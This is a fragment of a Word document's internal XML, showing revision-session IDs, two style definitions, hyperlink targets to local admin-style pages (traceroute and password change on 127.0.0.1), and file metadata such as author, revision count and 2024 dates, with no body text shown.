    <w:rsid w:val="009D2DC3"/>
    <w:rsid w:val="009E2B96"/>
    <w:rsid w:val="00A27277"/>
    <w:rsid w:val="00A43CCD"/>
    <w:rsid w:val="00A53B94"/>
    <w:rsid w:val="00A81E15"/>
    <w:rsid w:val="00A96675"/>
    <w:rsid w:val="00AA3614"/>
    <w:rsid w:val="00AD1870"/>
    <w:rsid w:val="00B549FC"/>
    <w:rsid w:val="00B97774"/>
    <w:rsid w:val="00BB68D5"/>
    <w:rsid w:val="00BC6BE9"/>
    <w:rsid w:val="00C06C64"/>
    <w:rsid w:val="00C22DF5"/>
    <w:rsid w:val="00C30428"/>
    <w:rsid w:val="00C33284"/>
    <w:rsid w:val="00C5174A"/>
    <w:rsid w:val="00C55FF6"/>
    <w:rsid w:val="00C633AF"/>
    <w:rsid w:val="00C64ECB"/>
    <w:rsid w:val="00C85EDA"/>
    <w:rsid w:val="00CA6B14"/>
    <w:rsid w:val="00CB0C6C"/>
    <w:rsid w:val="00CD54AE"/>
    <w:rsid w:val="00CE0D02"/>
    <w:rsid w:val="00D15334"/>
    <w:rsid w:val="00D31149"/>
    <w:rsid w:val="00D446C1"/>
    <w:rsid w:val="00D44E98"/>
    <w:rsid w:val="00D45632"/>
    <w:rsid w:val="00D4650B"/>
    <w:rsid w:val="00D46645"/>
    <w:rsid w:val="00D576E0"/>
    <w:rsid w:val="00D63610"/>
    <w:rsid w:val="00D650F2"/>
    <w:rsid w:val="00D65EDB"/>
    <w:rsid w:val="00D85098"/>
    <w:rsid w:val="00DB5305"/>
    <w:rsid w:val="00DC79A1"/>
    <w:rsid w:val="00DF0CA3"/>
    <w:rsid w:val="00E24736"/>
    <w:rsid w:val="00E41452"/>
    <w:rsid w:val="00E55405"/>
    <w:rsid w:val="00E87103"/>
    <w:rsid w:val="00E903F0"/>
    <w:rsid w:val="00EF1B07"/>
    <w:rsid w:val="00F82300"/>
    <w:rsid w:val="00F86530"/>
    <w:rsid w:val="00F97CF5"/>
    <w:rsid w:val="00FA24D8"/>
    <w:rsid w:val="00FB0F57"/>
    <w:rsid w:val="00FC72C9"/>
    <w:rsid w:val="00FF1A29"/>
    <w:rsid w:val="00FF4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203BB"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{3760C937-6E4A-4F4B-B37C-D158BFB0C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69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A69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09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1099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85515B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A691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A69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E903F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903F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903F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903F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809CB"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="md-plain">
    <w:name w:val="md-plain"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="008809CB"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="md-end-block">
    <w:name w:val="md-end-block"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="0087425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346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127.0.0.1/advance/traceroute.html?time=1696861371925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hyperlink" Target="http://127.0.0.1/advance/changepwd.html?time=1715093812978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344</Words>
  <Characters>1964</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>16</Lines>
  <Paragraphs>4</Paragraphs>
  <ScaleCrop>false</ScaleCrop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衡 张</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>衡 张</cp:lastModifiedBy>
  <cp:revision>139</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-03-13T09:11:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-05-07T15:20:00Z</dcterms:modified>
</cp:coreProperties>
</file>